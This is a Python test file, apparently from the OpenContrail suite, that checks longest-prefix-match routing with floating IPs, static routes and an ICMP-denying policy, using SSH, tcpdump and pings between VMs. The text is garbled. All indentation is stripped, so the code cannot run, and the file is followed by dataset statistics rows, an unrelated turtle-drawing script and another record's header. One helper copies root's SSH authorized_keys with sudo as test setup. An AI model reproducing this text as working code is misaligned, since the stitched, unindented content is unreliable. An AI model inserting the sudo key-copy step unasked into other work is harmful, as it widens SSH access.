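# provision_static_route.py (run from /opt/contrail/utils on the cfgm node) adds the given prefix to a route table and attaches it to the specified VMI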
self.logger.info("Create static IP for 2.2.2.0/24 pointing to vm2 ")
with settings(
host_string='%s@%s' % (
self.inputs.username, self.inputs.cfgm_ips[0]),
password=self.inputs.password, warn_only=True, abort_on_prompts=False, debug=True):
status = run('cd /opt/contrail/utils;' + add_static_route_cmd)
self.logger.debug("%s" % status)
m = re.search(r'Creating Route table', status)
assert m, 'Failed in Creating Route table'
compute_ip = vm2_fixture.vm_node_ip
compute_user = self.inputs.host_data[compute_ip]['username']
compute_password = self.inputs.host_data[compute_ip]['password']
session = ssh(compute_ip, compute_user, compute_password)
vm2_tapintf = vm2_fixture.tap_intf[vn1_fixture.vn_fq_name]['name']
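# Capture ICMP on vm2's tap interface to confirm whether traffic follows the interface static route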
cmd = 'tcpdump -ni %s icmp -vvv -c 2 > /tmp/%s_out.log' % (vm2_tapintf,
vm2_tapintf)
execute_cmd(session, cmd, self.logger)
assert not(vm1_fixture.ping_to_ip(vm3_fixture.vm_ip, count='20'))
self.logger.info('***** Will check the result of tcpdump *****')
output_cmd = 'cat /tmp/%s_out.log' % vm2_tapintf
output, err = execute_cmd_out(session, output_cmd, self.logger)
print output
if vm1_fixture.vm_ip in output:
self.logger.info(
'Traffic is going to vm222; the static route is configured correctly')
else:
result = False
self.logger.error(
'Static route for subnet 2.2.2.0/24 is not configured correctly')
fip_pool_name = 'test-floating-pool1'
fip_fixture = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name, vn_id=vn2_fixture.vn_id))
fip_id = fip_fixture.create_and_assoc_fip(
vn2_fixture.vn_id, vm1_fixture.vm_id)
self.addCleanup(fip_fixture.disassoc_and_delete_fip, fip_id)
assert fip_fixture.verify_fip(fip_id, vm1_fixture, vn2_fixture)
execute_cmd(session, cmd, self.logger)
if not (vm1_fixture.ping_with_certainty(vm3_fixture.vm_ip)):
result = result and False
self.logger.error(
'Longest prefix match route is not taken; ping via the floating IP is failing')
self.logger.info('***** Will check the result of tcpdump *****')
output_cmd = 'cat /tmp/%s_out.log' % vm2_tapintf
output, err = execute_cmd_out(session, output_cmd, self.logger)
print output
if vm1_fixture.vm_ip in output:
self.logger.error(
'Ping is still going to vm222 due to the added static route; not expected')
result = False
else:
self.logger.info(
'Route with longest prefix match is followed as expected')
del_static_route_cmd = 'python provision_static_route.py --prefix 2.2.2.0/24 --virtual_machine_interface_id ' + vm2_vmi_id + \
' --tenant_name "admin" --api_server_ip 127.0.0.1 --api_server_port 8082 --oper del --route_table_name my_route_table'
self.logger.info("Delete static IP for 2.2.2.0/24 pointing to vm2 ")
with settings(
host_string='%s@%s' % (
self.inputs.username, self.inputs.cfgm_ips[0]),
password=self.inputs.password, warn_only=True, abort_on_prompts=False, debug=True):
status = run('cd /opt/contrail/utils;' + del_static_route_cmd)
self.logger.debug("%s" % status)
assert result
return True
# end test_longest_prefix_match_with_fip_and_staticroute
@preposttest_wrapper
def test_longest_prefix_match_with_fip_and_policy(self):
'''1. Create vn1 and vn2; launch vm1 in vn1 and vm2 in vn2
2. Create policy between vn1 and vn2 to allow all protocols except ICMP, expect ping to fail & scp to pass from vm1 to vm2 to verify policy
3. Allocate fip from vn2 to vm1
4. Expect ping from vm1 to vm2 to pass, following longest prefix match
'''
result = True
vn1_name = 'vn111'
vn1_subnets = ['1.1.1.0/24']
vn1_fixture = self.useFixture(
VNFixture(
project_name=self.inputs.project_name, connections=self.connections,
vn_name=vn1_name, inputs=self.inputs, subnets=vn1_subnets))
assert vn1_fixture.verify_on_setup()
vn1_obj = vn1_fixture.obj
vn2_name = 'vn222'
vn2_subnets = ['2.2.2.0/24']
vn2_fixture = self.useFixture(
VNFixture(
project_name=self.inputs.project_name, connections=self.connections,
vn_name=vn2_name, inputs=self.inputs, subnets=vn2_subnets))
assert vn2_fixture.verify_on_setup()
vn2_obj = vn2_fixture.obj
vm1_name = 'vm111'
vm1_fixture = self.useFixture(VMFixture(connections=self.connections,
vn_obj=vn1_obj, vm_name=vm1_name, project_name=self.inputs.project_name))
assert vm1_fixture.verify_on_setup()
vm2_name = 'vm222'
vm2_fixture = self.useFixture(VMFixture(connections=self.connections,
vn_obj=vn2_obj, vm_name=vm2_name, project_name=self.inputs.project_name))
assert vm2_fixture.verify_on_setup()
self.nova_fixture.wait_till_vm_is_up(vm1_fixture.vm_obj)
self.nova_fixture.wait_till_vm_is_up(vm2_fixture.vm_obj)
rules = [
{
'direction': '<>', 'simple_action': 'deny',
'protocol': 'icmp',
'src_ports': 'any',
'dst_ports': 'any',
'source_network': vn1_name,
'dest_network': vn2_name,
},
{
'direction': '<>', 'simple_action': 'pass',
'protocol': 'any',
'src_ports': 'any',
'source_network': vn1_name,
'dest_network': vn2_name,
'dst_ports': 'any',
},
]
policy_name = 'policy_no_icmp'
policy_fixture = self.useFixture(
PolicyFixture(
policy_name=policy_name, rules_list=rules, inputs=self.inputs,
connections=self.connections))
policy_fq_name = [policy_fixture.policy_fq_name]
vn1_fixture.bind_policies(policy_fq_name, vn1_fixture.vn_id)
self.addCleanup(vn1_fixture.unbind_policies,
vn1_fixture.vn_id, [policy_fixture.policy_fq_name])
vn2_fixture.bind_policies(policy_fq_name, vn2_fixture.vn_id)
self.addCleanup(vn2_fixture.unbind_policies,
vn2_fixture.vn_id, [policy_fixture.policy_fq_name])
vn1_fixture.verify_on_setup()
vn2_fixture.verify_on_setup()
for i in range(3):
self.logger.info("Expecting the ping to fail")
assert not (vm1_fixture.ping_to_ip(vm2_fixture.vm_ip)
), 'Policy not applied correctly; ping should fail as icmp is denied'
assert self.scp_files_to_vm(
vm1_fixture, vm2_fixture), 'Failed to scp file to vm '
fip_pool_name = 'test-floating-pool'
fip_fixture = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name, vn_id=vn2_fixture.vn_id))
fip_id = fip_fixture.create_and_assoc_fip(
vn2_fixture.vn_id, vm1_fixture.vm_id)
self.addCleanup(fip_fixture.disassoc_and_delete_fip, fip_id)
assert fip_fixture.verify_fip(fip_id, vm1_fixture, vn2_fixture)
if not (vm1_fixture.ping_with_certainty(vm2_fixture.vm_ip)):
self.logger.error(
'Route with longest prefix match is not followed; fip ping should have passed')
result = False
assert result, 'Ping by floating ip failed'
assert self.scp_files_to_vm(
vm1_fixture, vm2_fixture), 'Failed to scp file to vm '
return True
# end test_longest_prefix_match_with_fip_and_policy
def scp_files_to_vm(self, src_vm, dst_vm):
result = True
src_vm.put_pub_key_to_vm()
dst_vm.put_pub_key_to_vm()
dest_vm_ip = dst_vm.vm_ip
file_sizes = ['1000', '1101', '1202']
for size in file_sizes:
self.logger.info("-" * 80)
self.logger.info("FILE SIZE = %sB" % size)
self.logger.info("-" * 80)
self.logger.info('Transferring the file from %s to %s using scp' %
(src_vm.vm_name, dst_vm.vm_name))
filename = 'testfile'
# Create file
cmd = 'dd bs=%s count=1 if=/dev/zero of=%s' % (size, filename)
src_vm.run_cmd_on_vm(cmds=[cmd])
# Copy key
dst_vm.run_cmd_on_vm(
cmds=['cp -f ~root/.ssh/authorized_keys ~/.ssh/'], as_sudo=True)
# Scp the file from the source VM to the destination VM's IP
src_vm.scp_file_to_vm(filename, vm_ip=dst_vm.vm_ip)
src_vm.run_cmd_on_vm(cmds=['sync'])
# Verify if file size is same in destination vm
out_dict = dst_vm.run_cmd_on_vm(
cmds=['ls -l %s' % (filename)])
if size in out_dict.values()[0]:
self.logger.info('File of size %s is transferred successfully to \
%s by scp ' % (size, dest_vm_ip))
else:
self.logger.warn('File of size %s is not transferred correctly to %s \
by scp !! Please check logs' % (size, dest_vm_ip))
result = result and False
return result
@preposttest_wrapper
def test_longest_prefix_match_with_fip_and_native_staticroute(self):
''' Test Longest prefix match when native VRF has longer prefix than FIP VRF
'''
result= True
vn1_name='vn111'
vn1_subnets=['1.1.1.0/24']
vn1_fixture= self.useFixture(VNFixture(project_name= self.inputs.project_name, connections= self.connections,
vn_name=vn1_name, inputs= self.inputs, subnets= vn1_subnets))
assert vn1_fixture.verify_on_setup()
vn1_obj= vn1_fixture.obj
vn2_name='vn222'
vn2_subnets=['2.2.2.0/24']
vn2_fixture= self.useFixture(VNFixture(project_name= self.inputs.project_name, connections= self.connections,
vn_name=vn2_name, inputs= self.inputs, subnets= vn2_subnets))
assert vn2_fixture.verify_on_setup()
vn2_obj= vn2_fixture.obj
vn3_name='vn333'
vn3_subnets=['10.1.1.0/24']
vn3_fixture= self.useFixture(VNFixture(project_name= self.inputs.project_name, connections= self.connections,
vn_name=vn3_name, inputs= self.inputs, subnets= vn3_subnets))
assert vn3_fixture.verify_on_setup()
vn3_obj= vn3_fixture.obj
vm1_name='vm111'
vm1_fixture= self.useFixture(VMFixture(connections= self.connections,
vn_obj=vn1_obj, vm_name= vm1_name, project_name= self.inputs.project_name))
assert vm1_fixture.verify_on_setup()
vm2_name='vm222'
vm2_fixture= self.useFixture(VMFixture(connections= self.connections,
vn_objs=[vn1_obj, vn2_obj], vm_name= vm2_name, project_name= self.inputs.project_name))
assert vm2_fixture.verify_on_setup()
vm3_name='vm333'
vm3_fixture= self.useFixture(VMFixture(connections= self.connections,
vn_obj=vn3_obj, vm_name= vm3_name, project_name= self.inputs.project_name))
assert vm3_fixture.verify_on_setup()
self.nova_fixture.wait_till_vm_is_up( vm1_fixture.vm_obj)
self.nova_fixture.wait_till_vm_is_up( vm2_fixture.vm_obj)
self.nova_fixture.wait_till_vm_is_up( vm3_fixture.vm_obj)
cmd_to_pass1=['ifconfig eth1 up']
vm2_fixture.run_cmd_on_vm(cmds=cmd_to_pass1, as_sudo=True)
sleep(10)
cmd_to_pass2=['dhclient eth1']
output=vm2_fixture.run_cmd_on_vm(cmds=cmd_to_pass2, as_sudo=True)
sleep(30)
self.logger.info("%s"%output)
vm2_eth1_ip = vm2_fixture.vm_ips[1]
vm3_vmi_id = vm3_fixture.cs_vmi_obj[vn3_fixture.vn_fq_name]['virtual-machine-interface']['uuid']
vm2_vmi_id = vm2_fixture.cs_vmi_obj[vn1_fixture.vn_fq_name]['virtual-machine-interface']['uuid']
add_static_route_cmd = 'python provision_static_route.py --prefix 2.2.2.0/24 --virtual_machine_interface_id ' +vm3_vmi_id+' --tenant_name "admin" --api_server_ip 127.0.0.1 --api_server_port 8082 --oper add --route_table_name my_route_table'
self.logger.info("Create static route 2.2.2.0/24 pointing to vm3 \n")
with settings(host_string= '%s@%s' %(self.inputs.username, self.inputs.cfgm_ips[0]),
password= self.inputs.password,warn_only=True,abort_on_prompts=False,debug=True):
status= run('cd /opt/contrail/utils;'+add_static_route_cmd)
self.logger.debug("%s"%status)
m = re.search(r'Creating Route table',status)
assert m , 'Failed in Creating Route table'
fip_pool_name= 'test-floating-pool'
fip_fixture= self.useFixture(FloatingIPFixture( project_name= self.inputs.project_name, inputs = self.inputs,
connections= self.connections, pool_name = fip_pool_name, vn_id= vn3_fixture.vn_id ))
fip_id= fip_fixture.create_and_assoc_fip(vn3_fixture.vn_id, vm1_fixture.vm_id)
self.addCleanup( fip_fixture.disassoc_and_delete_fip, fip_id)
assert fip_fixture.verify_fip( fip_id, vm1_fixture, vn3_fixture)
vm1_fip = vm1_fixture.vnc_lib_h.floating_ip_read(
id=fip_id).get_floating_ip_address()
compute_ip = vm3_fixture.vm_node_ip
compute_user = self.inputs.host_data[compute_ip]['username']
compute_password = self.inputs.host_data[compute_ip]['password']
session = ssh(compute_ip,compute_user,compute_password)
vm3_tapintf = vm3_fixture.tap_intf[vn3_fixture.vn_fq_name]['name']
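# Capture ICMP on vm3's tap interface to confirm the 2.2.2.0/24 static route initially attracts the traffic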
cmd = 'tcpdump -ni %s icmp -vvv -c 2 > /tmp/%s_out.log'%(vm3_tapintf, vm3_tapintf)
execute_cmd(session, cmd, self.logger)
assert not(vm1_fixture.ping_to_ip(vm2_eth1_ip, count='20'))
self.logger.info('***** Will check the result of tcpdump *****\n')
output_cmd= 'cat /tmp/%s_out.log'%vm3_tapintf
output, err = execute_cmd_out(session, output_cmd, self.logger)
print output
if vm1_fip in output:
self.logger.info('Traffic is going to vm333; the static route is configured correctly \n')
else:
result= result and False
self.logger.error('Static route for subnet 2.2.2.0/24 is not configured correctly \n')
static_route_vm2= vm2_fixture.vm_ips[1] + '/' + '32'
add_static_route_cmd = 'python provision_static_route.py --prefix ' + static_route_vm2 + ' --virtual_machine_interface_id ' +vm2_vmi_id+' --tenant_name "admin" --api_server_ip 127.0.0.1 --api_server_port 8082 --oper add --route_table_name my_route_table'
self.logger.info("Create static route %s pointing to vm111 eth0 interface \n"%static_route_vm2)
with settings(host_string= '%s@%s' %(self.inputs.username, self.inputs.cfgm_ips[0]),
password= self.inputs.password,warn_only=True,abort_on_prompts=False,debug=True):
status= run('cd /opt/contrail/utils;'+add_static_route_cmd)
self.logger.debug("%s"%status)
execute_cmd(session, cmd, self.logger)
if not (vm1_fixture.ping_with_certainty( vm2_eth1_ip )):
result = result and False
self.logger.error('Longest prefix match route is not taken; ping using the native static route is failing \n')
self.logger.info('***** Will check the result of tcpdump *****')
output_cmd= 'cat /tmp/%s_out.log'%vm3_tapintf
output, err = execute_cmd_out(session, output_cmd, self.logger)
print output
if vm1_fip in output:
self.logger.error('Ping is still going to vm333; problem with static route %s, longest prefix route not followed \n'%static_route_vm2)
result= result and False
else:
self.logger.info('Ping not going to vm333 as expected \n')
del_static_route_cmd1 = 'python provision_static_route.py --prefix 2.2.2.0/24 --virtual_machine_interface_id ' +vm3_vmi_id+' --tenant_name "admin" --api_server_ip 127.0.0.1 --api_server_port 8082 --oper del --route_table_name my_route_table'
del_static_route_cmd2 = 'python provision_static_route.py --prefix ' + static_route_vm2 + ' --virtual_machine_interface_id ' +vm2_vmi_id+' --tenant_name "admin" --api_server_ip 127.0.0.1 --api_server_port 8082 --oper del --route_table_name my_route_table'
self.logger.info("Delete static IP for 2.2.2.0/24 pointing to vm333 \n")
self.logger.info("Delete static IP for %s pointing to vm111 \n"%static_route_vm2)
with settings(host_string= '%s@%s' %(self.inputs.username, self.inputs.cfgm_ips[0]),
password= self.inputs.password,warn_only=True,abort_on_prompts=False,debug=True):
status= run('cd /opt/contrail/utils;'+del_static_route_cmd1)
self.logger.debug("%s"%status)
status= run('cd /opt/contrail/utils;'+del_static_route_cmd2)
self.logger.debug("%s"%status)
assert result , 'Failed to take route with longest prefix'
return True
#end test_longest_prefix_match_with_fip_and_native_staticroute
@preposttest_wrapper
def test_longest_prefix_match_with_2fip_different_vn_name(self):
''' Allocate 2 FIPs from different VNs. Both floating VNs push the same route; the VM should pick the route based on the destination VN name (the lexicographically smaller name wins).
FIP is allocated from vnaaa and vnbbb and both push the same route, so traffic is expected on the interface associated with vnaaa
'''
result= True
vn1_name='vn111'
vn1_subnets=['1.1.1.0/24']
vn1_fixture= self.useFixture(VNFixture(project_name= self.inputs.project_name, connections= self.connections,
vn_name=vn1_name, inputs= self.inputs, subnets= vn1_subnets))
assert vn1_fixture.verify_on_setup()
vn1_obj= vn1_fixture.obj
vn2_name='vnaaa'
vn2_subnets=['2.2.2.0/24']
vn2_fixture= self.useFixture(VNFixture(project_name= self.inputs.project_name, connections= self.connections,
vn_name=vn2_name, inputs= self.inputs, subnets= vn2_subnets))
assert vn2_fixture.verify_on_setup()
vn2_obj= vn2_fixture.obj
vn3_name='vnbbb'
vn3_subnets=['3.3.3.0/24']
vn3_fixture= self.useFixture(VNFixture(project_name= self.inputs.project_name, connections= self.connections,
vn_name=vn3_name, inputs= self.inputs, subnets= vn3_subnets))
assert vn3_fixture.verify_on_setup()
vn3_obj= vn3_fixture.obj
vn4_name='vn444'
vn4_subnets=['4.4.4.0/24']
vn4_fixture= self.useFixture(VNFixture(project_name= self.inputs.project_name, connections= self.connections,
vn_name=vn4_name, inputs= self.inputs, subnets= vn4_subnets))
assert vn4_fixture.verify_on_setup()
vn4_obj= vn4_fixture.obj
vm1_name='vm111'
vm1_fixture= self.useFixture(VMFixture(connections= self.connections,
vn_objs=[vn1_obj, vn2_obj, vn3_obj], vm_name= vm1_name, project_name= self.inputs.project_name))
assert vm1_fixture.verify_on_setup()
vm2_name='vm222'
vm2_fixture= self.useFixture(VMFixture(connections= self.connections,
vn_obj=vn4_obj, vm_name= vm2_name, project_name= self.inputs.project_name))
assert vm2_fixture.verify_on_setup()
self.nova_fixture.wait_till_vm_is_up( vm1_fixture.vm_obj)
self.nova_fixture.wait_till_vm_is_up( vm2_fixture.vm_obj)
cmd_to_pass1=['ifconfig eth1 up']
vm1_fixture.run_cmd_on_vm(cmds=cmd_to_pass1, as_sudo=True)
sleep(10)
cmd_to_pass2=['ifconfig eth2 up']
vm1_fixture.run_cmd_on_vm(cmds=cmd_to_pass2, as_sudo=True)
sleep(10)
cmd_list= 'dhclient eth1;dhclient eth2'
cmd_to_pass=[cmd_list]
output=vm1_fixture.run_cmd_on_vm(cmds=cmd_to_pass, as_sudo=True)
sleep(30)
vm1_eth1_vmi_id = vm1_fixture.cs_vmi_obj[vn2_fixture.vn_fq_name]['virtual-machine-interface']['uuid']
vm1_eth2_vmi_id = vm1_fixture.cs_vmi_obj[vn3_fixture.vn_fq_name]['virtual-machine-interface']['uuid']
static_route_vm1_eth0 = vm1_fixture.vm_ip + '/' + '32'
add_static_route_cmd1 = 'python provision_static_route.py --prefix ' + static_route_vm1_eth0 + ' --virtual_machine_interface_id ' +vm1_eth1_vmi_id+' --tenant_name "admin" --api_server_ip 127.0.0.1 --api_server_port 8082 --oper add --route_table_name my_route_table1'
add_static_route_cmd2 = 'python provision_static_route.py --prefix ' + static_route_vm1_eth0 + ' --virtual_machine_interface_id ' +vm1_eth2_vmi_id+' --tenant_name "admin" --api_server_ip 127.0.0.1 --api_server_port 8082 --oper add --route_table_name my_route_table2'
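# The same /32 host route (vm1 eth0 IP) is pushed through both FIP-provider VNs, so the tie should be broken by the destination VN name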
self.logger.info("Create static route %s pointing to eth0 of vm1 \n"%static_route_vm1_eth0)
with settings(host_string= '%s@%s' %(self.inputs.username, self.inputs.cfgm_ips[0]),
password= self.inputs.password,warn_only=True,abort_on_prompts=False,debug=True):
status1= run('cd /opt/contrail/utils;'+add_static_route_cmd1)
self.logger.debug("%s"%status1)
m = re.search(r'Creating Route table',status1)
assert m , 'Failed in Creating Route table'
status2= run('cd /opt/contrail/utils;'+add_static_route_cmd2)
self.logger.debug("%s"%status2)
m = re.search(r'Creating Route table',status2)
assert m , 'Failed in Creating Route table'
fip_pool_name1= 'test-floating-pool1'
fip_fixture1= self.useFixture(FloatingIPFixture( project_name= self.inputs.project_name, inputs = self.inputs,
connections= self.connections, pool_name = fip_pool_name1, vn_id= vn2_fixture.vn_id ))
fip_id1= fip_fixture1.create_and_assoc_fip(vn2_fixture.vn_id, vm2_fixture.vm_id)
self.addCleanup( fip_fixture1.disassoc_and_delete_fip, fip_id1)
assert fip_fixture1.verify_fip( fip_id1, vm2_fixture, vn2_fixture)
vm2_fip1 = vm2_fixture.vnc_lib_h.floating_ip_read(
id=fip_id1).get_floating_ip_address()
fip_pool_name2= 'test-floating-pool2'
fip_fixture2= self.useFixture(FloatingIPFixture( project_name= self.inputs.project_name, inputs = self.inputs,
connections= self.connections, pool_name = fip_pool_name2, vn_id= vn3_fixture.vn_id ))
fip_id2= fip_fixture2.create_and_assoc_fip(vn3_fixture.vn_id, vm2_fixture.vm_id)
self.addCleanup( fip_fixture2.disassoc_and_delete_fip, fip_id2)
assert fip_fixture2.verify_fip( fip_id2, vm2_fixture, vn3_fixture)
vm2_fip2 = vm2_fixture.vnc_lib_h.floating_ip_read(
id=fip_id2).get_floating_ip_address()
compute_ip = vm1_fixture.vm_node_ip
compute_user = self.inputs.host_data[compute_ip]['username']
compute_password = self.inputs.host_data[compute_ip]['password']
session = ssh(compute_ip,compute_user,compute_password)
vm1_tapintf_eth1 = vm1_fixture.tap_intf[vn2_fixture.vn_fq_name]['name']
vm1_tapintf_eth2 = vm1_fixture.tap_intf[vn3_fixture.vn_fq_name]['name']
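# Capture ICMP on both tap interfaces (vnaaa and vnbbb) to see which FIP path carries the traffic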
cmd1 = 'tcpdump -ni %s icmp -vvv -c 2 > /tmp/%s_out.log'%(vm1_tapintf_eth1, vm1_tapintf_eth1)
cmd2 = 'tcpdump -ni %s icmp -vvv -c 2 > /tmp/%s_out.log'%(vm1_tapintf_eth2, vm1_tapintf_eth2)
execute_cmd(session, cmd1, self.logger)
execute_cmd(session, cmd2, self.logger)
if not (vm2_fixture.ping_with_certainty(vm1_fixture.vm_ip, count='20' )):
result = result and False
self.logger.error("Ping from vm222 to vm111 failed not expected")
self.logger.info('***** Will check the result of tcpdump *****\n')
output_cmd1= 'cat /tmp/%s_out.log'%vm1_tapintf_eth1
output_cmd2= 'cat /tmp/%s_out.log'%vm1_tapintf_eth2
output1, err = execute_cmd_out(session, output_cmd1, self.logger)
output2, err = execute_cmd_out(session, output_cmd2, self.logger)
print output1
print output2
if vm2_fip1 in output1:
self.logger.info('Traffic is going through vm111 eth1 interface as the vn name (vnaaa) is smaller here, longest prefix match is followed \n')
else:
result= result and False
self.logger.error('Traffic is not going through vm111 eth1 interface though the vn name is smaller here; not expected \n')
if vm2_fip2 in output2:
self.logger.error('Traffic is going through vm111 eth2 interface not expected \n')
result= result and False
else:
self.logger.info('Traffic is not going through vm111 eth2 interface since associated vn name (vnbbb) is greater than vnaaa, longest prefix match followed \n')
del_static_route_cmd1 = 'python provision_static_route.py --prefix ' + static_route_vm1_eth0 + ' --virtual_machine_interface_id ' +vm1_eth1_vmi_id+' --tenant_name "admin" --api_server_ip 127.0.0.1 --api_server_port 8082 --oper del --route_table_name my_route_table1'
del_static_route_cmd2 = 'python provision_static_route.py --prefix ' + static_route_vm1_eth0 + ' --virtual_machine_interface_id ' +vm1_eth2_vmi_id+' --tenant_name "admin" --api_server_ip 127.0.0.1 --api_server_port 8082 --oper del --route_table_name my_route_table2'
self.logger.info("Delete static route %s pointing to eth0 of vm1 \n"%static_route_vm1_eth0)
with settings(host_string= '%s@%s' %(self.inputs.username, self.inputs.cfgm_ips[0]),
password= self.inputs.password,warn_only=True,abort_on_prompts=False,debug=True):
status1= run('cd /opt/contrail/utils;'+del_static_route_cmd1)
self.logger.debug("%s"%status1)
status2= run('cd /opt/contrail/utils;'+del_static_route_cmd2)
self.logger.debug("%s"%status2)
assert result , 'Longest prefix match rule not followed'
return True
# end test_longest_prefix_match_with_2fip_different_vn_name
@preposttest_wrapper
def test_longest_prefix_match_with_two_fips_from_same_vn(self):
''' Allocate 2 FIPs from the same VN. The VM should choose the path with the lower IP address.
'''
result= True
vn1_name='vn111'
vn1_subnets=['1.1.1.0/24']
vn1_fixture= self.useFixture(VNFixture(project_name= self.inputs.project_name, connections= self.connections,
vn_name=vn1_name, inputs= self.inputs, subnets= vn1_subnets))
assert vn1_fixture.verify_on_setup()
vn1_obj= vn1_fixture.obj
vn2_name='vn222'
vn2_subnets=['2.2.2.0/24']
vn2_fixture= self.useFixture(VNFixture(project_name= self.inputs.project_name, connections= self.connections,
vn_name=vn2_name, inputs= self.inputs, subnets= vn2_subnets))
assert vn2_fixture.verify_on_setup()
vn2_obj= vn2_fixture.obj
vm1_name='vm111'
vm1_fixture= self.useFixture(VMFixture(connections= self.connections,
vn_obj=vn1_obj, vm_name= vm1_name, project_name= self.inputs.project_name))
assert vm1_fixture.verify_on_setup()
vm2_name='vm222'
vm2_fixture= self.useFixture(VMFixture(connections= self.connections,
vn_obj=vn2_obj, vm_name= vm2_name, project_name= self.inputs.project_name))
assert vm2_fixture.verify_on_setup()
fip_pool_name= 'test-floating-pool'
fip_fixture= self.useFixture(FloatingIPFixture( project_name= self.inputs.project_name, inputs = self.inputs,
connections= self.connections, pool_name = fip_pool_name, vn_id= vn1_fixture.vn_id ))
fip_id1= fip_fixture.create_and_assoc_fip(vn1_fixture.vn_id, vm2_fixture.vm_id)
fip_id2= fip_fixture.create_and_assoc_fip(vn1_fixture.vn_id, vm2_fixture.vm_id)
self.addCleanup( fip_fixture.disassoc_and_delete_fip, fip_id2)
assert fip_fixture.verify_fip( fip_id1, vm2_fixture, vn1_fixture)
assert fip_fixture.verify_fip( fip_id2, vm2_fixture, vn1_fixture)
vm2_fip1 = vm2_fixture.vnc_lib_h.floating_ip_read(
id=fip_id1).get_floating_ip_address()
vm2_fip2 = vm2_fixture.vnc_lib_h.floating_ip_read(
id=fip_id2).get_floating_ip_address()
compute_ip = vm1_fixture.vm_node_ip
compute_user = self.inputs.host_data[compute_ip]['username']
compute_password = self.inputs.host_data[compute_ip]['password']
session = ssh(compute_ip,compute_user,compute_password)
vm1_tapintf = vm1_fixture.tap_intf[vn1_fixture.vn_fq_name]['name']
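# Capture ICMP on vm1's tap interface to check which FIP the traffic from vm2 uses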
cmd = 'tcpdump -ni %s icmp -vvv -c 2 > /tmp/%s_out.log'%(vm1_tapintf, vm1_tapintf)
execute_cmd(session, cmd, self.logger)
if not (vm2_fixture.ping_with_certainty(vm1_fixture.vm_ip, count='20' )):
result = result and False
self.logger.error("Ping from vm222 to vm111 failed not expected")
self.logger.info('***** Will check the result of tcpdump *****\n')
output_cmd= 'cat /tmp/%s_out.log'%vm1_tapintf
output, err = execute_cmd_out(session, output_cmd, self.logger)
print output
if vm2_fip1 > vm2_fip2:
smaller_fip = vm2_fip2
else:
smaller_fip = vm2_fip1
if smaller_fip in output:
self.logger.info('Traffic is sent using the smaller fip when 2 fips are allocated from the same vn, as expected \n')
else:
result= result and False
self.logger.error('Traffic is not sent using the smaller fip when 2 fips are allocated from the same vn; not expected \n')
fip_id3= fip_fixture.create_and_assoc_fip(vn1_fixture.vn_id, vm2_fixture.vm_id)
self.addCleanup( fip_fixture.disassoc_and_delete_fip, fip_id3)
assert fip_fixture.verify_fip( fip_id3, vm2_fixture, vn1_fixture)
vm2_fip3 = vm2_fixture.vnc_lib_h.floating_ip_read(
id=fip_id3).get_floating_ip_address()
fip_fixture.disassoc_and_delete_fip(fip_id1)
execute_cmd(session, cmd, self.logger)
if not (vm2_fixture.ping_with_certainty(vm1_fixture.vm_ip, count='20' )):
result = result and False
self.logger.error("Ping from vm222 to vm111 failed not expected")
self.logger.info('***** Will check the result of tcpdump *****')
output_cmd= 'cat /tmp/%s_out.log'%vm1_tapintf
output, err = execute_cmd_out(session, output_cmd, self.logger)
print output
if vm2_fip2 > vm2_fip3:
smaller_fip = vm2_fip3
else:
smaller_fip = vm2_fip2
if smaller_fip in output:
self.logger.info('Traffic is sent using the smaller fip when 2 fips are allocated from the same vn, as expected \n')
else:
result= result and False
self.logger.error('Traffic is not sent using the smaller fip when 2 fips are allocated from the same vn; not expected \n')
assert result, 'Longest prefix match rule is not followed'
return True
#end test_longest_prefix_match_with_two_fips_from_same_vn
| 47.944651
| 275
| 0.650639
| 17,012
| 129,067
| 4.614507
| 0.044204
| 0.032483
| 0.025668
| 0.034904
| 0.847902
| 0.821979
| 0.790031
| 0.762707
| 0.739994
| 0.715001
| 0
| 0.031429
| 0.264134
| 129,067
| 2,691
| 276
| 47.962467
| 0.795117
| 0.055475
| 0
| 0.720167
| 0
| 0.006013
| 0.135292
| 0.006667
| 0.001388
| 0
| 0
| 0
| 0.109158
| 0
| null | null | 0.016651
| 0.011563
| null | null | 0.005088
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
82cbeaad1bd0af0a257442d8a46b77a4bd877c86
| 272
|
py
|
Python
|
zadania01/zadC.py
|
JakubSakowski/CMI2020
|
ebe3388544f690a20fab7d926364b67e7f441044
|
[
"Apache-2.0"
] | null | null | null |
zadania01/zadC.py
|
JakubSakowski/CMI2020
|
ebe3388544f690a20fab7d926364b67e7f441044
|
[
"Apache-2.0"
] | null | null | null |
zadania01/zadC.py
|
JakubSakowski/CMI2020
|
ebe3388544f690a20fab7d926364b67e7f441044
|
[
"Apache-2.0"
] | null | null | null |
from turtle import *
def krzy():
fd(40),rt(90)
fd(40),rt(90)
fd(40),lt(90)
fd(40),rt(90)
fd(40),rt(90)
fd(40),lt(90)
fd(40),rt(90)
fd(40),rt(90)
fd(40),lt(90)
fd(40),rt(90)
fd(40),rt(90)
fd(40),lt(90)
krzy()
| 12.952381
| 19
| 0.452206
| 54
| 272
| 2.277778
| 0.185185
| 0.390244
| 0.536585
| 0.520325
| 0.780488
| 0.780488
| 0.780488
| 0.780488
| 0.780488
| 0.780488
| 0
| 0.253968
| 0.305147
| 272
| 20
| 20
| 13.6
| 0.396825
| 0
| 0
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066667
| true
| 0
| 0.066667
| 0
| 0.133333
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
7d9852bef58c253e3658c595a87fcb0d287f8920
| 132
|
py
|
Python
|
LIDG_v0.2/lidg/model_selection/__init__.py
|
Hitoshi-FUJII/LIDG
|
8af1f6a64d22c231df41f9a8872c1f52c5db4b1a
|
[
"MIT"
] | 6
|
2019-09-10T00:22:05.000Z
|
2022-02-21T04:30:36.000Z
|
